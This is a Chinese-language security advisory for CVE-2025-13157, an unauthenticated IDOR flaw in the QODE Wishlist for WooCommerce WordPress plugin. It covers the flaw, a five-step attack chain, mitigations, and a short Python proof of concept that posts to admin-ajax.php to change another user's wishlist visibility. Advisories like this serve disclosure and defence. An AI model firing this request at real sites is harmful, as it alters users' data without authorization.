CVE-2025-13157 WordPress QODE Wishlist插件IDOR漏洞

漏洞信息

漏洞编号

CVE-2025-13157

漏洞类型

IDOR（不安全直接对象引用）

CVSS评分

5.3 中危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

QODE Wishlist for WooCommerce WordPress插件

漏洞概述

CVE-2025-13157是WordPress插件QODE Wishlist for WooCommerce中的一个中等严重性安全漏洞。该插件是专为WooCommerce电商平台设计的愿望清单功能组件。漏洞存在于插件的'qode_wishlist_for_woocommerce_wishlist_table_item_callback'函数中，由于该函数缺少对用户可控键值的充分验证，导致存在不安全直接对象引用（IDOR）问题。攻击者可以利用此漏洞在无需任何认证的情况下，访问和修改任意用户的愿望清单公开视图设置。这可能导致用户隐私泄露，愿望清单内容被篡改，以及潜在的社会工程攻击风险。该漏洞影响所有版本直至1.2.7版本，CVSS 3.1评分5.3，属于中危级别漏洞。

技术细节

该IDOR漏洞源于插件在处理愿望清单表项目回调时，未能正确验证用户提交的键值参数。攻击者可以通过操纵请求中的wishlist标识符或相关参数，绕过访问控制直接访问或修改其他用户的愿望清单数据。具体来说，'qode_wishlist_for_woocommerce_wishlist_table_item_callback'函数在处理AJAX请求时，直接使用用户提供的参数而未进行权限检查或对象所有权验证。攻击者只需构造特定的HTTP请求，设置目标wishlist的ID，即可更新该wishlist的公开可见性设置。由于该端点无需认证即可访问（PR:N），任何网络可达的攻击者都可以利用此漏洞。CVSS向量显示该漏洞主要影响数据完整性（I:L），对机密性和可用性影响较小。

攻击链分析

STEP 1

步骤1

信息收集：攻击者识别目标WordPress网站并确认安装了QODE Wishlist for WooCommerce插件（版本≤1.2.7）

STEP 2

步骤2

枚举目标：攻击者通过合法途径获取或猜测目标用户的愿望清单ID（如通过社交工程、观察公开分享链接等）

STEP 3

步骤3

构造恶意请求：攻击者构造包含目标wishlist_id的AJAX请求，目标是'qode_wishlist_for_woocommerce_wishlist_table_item_callback'端点

STEP 4

步骤4

触发漏洞：由于缺少对象所有权验证和参数校验，服务器直接处理请求并更新指定wishlist的设置

STEP 5

步骤5

验证结果：攻击者确认wishlist的公开视图或其他设置已被成功篡改，可用于后续攻击或隐私侵犯

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

# CVE-2025-13157 PoC - IDOR in QODE Wishlist for WooCommerce
# Target: WordPress site with QODE Wishlist for WooCommerce plugin <= 1.2.7

import requests
import json

target_url = "http://target-wordpress-site.com"

# Find the AJAX endpoint for wishlist operations
ajax_endpoint = f"{target_url}/wp-admin/admin-ajax.php"

# Step 1: Identify target wishlist ID (could be enumerated or known)
target_wishlist_id = "12345"  # Replace with actual wishlist ID

# Step 2: Exploit IDOR to modify wishlist visibility
payload = {
    "action": "qode_wishlist_for_woocommerce_wishlist_table_item_callback",
    "wishlist_id": target_wishlist_id,
    "visibility": "public"  # Change to public or manipulate other settings
}

# Step 3: Send unauthenticated request
response = requests.post(ajax_endpoint, data=payload)

print(f"Status Code: {response.status_code}")
print(f"Response: {response.text}")

# Note: This PoC demonstrates the IDOR vulnerability where an unauthenticated
# attacker can modify arbitrary wishlist settings by changing the wishlist_id parameter

影响范围

QODE Wishlist for WooCommerce plugin <= 1.2.7

防御指南

临时缓解措施

在官方补丁发布之前，建议采取以下临时缓解措施：1）限制未认证用户对AJAX端点的访问；2）使用Web应用防火墙（WAF）规则阻止针对wishlist_id参数的异常请求；3）监控日志中的可疑wishlist操作行为；4）考虑使用第三方安全插件提供额外的访问控制层；5）限制WordPress REST API中相关端点的暴露。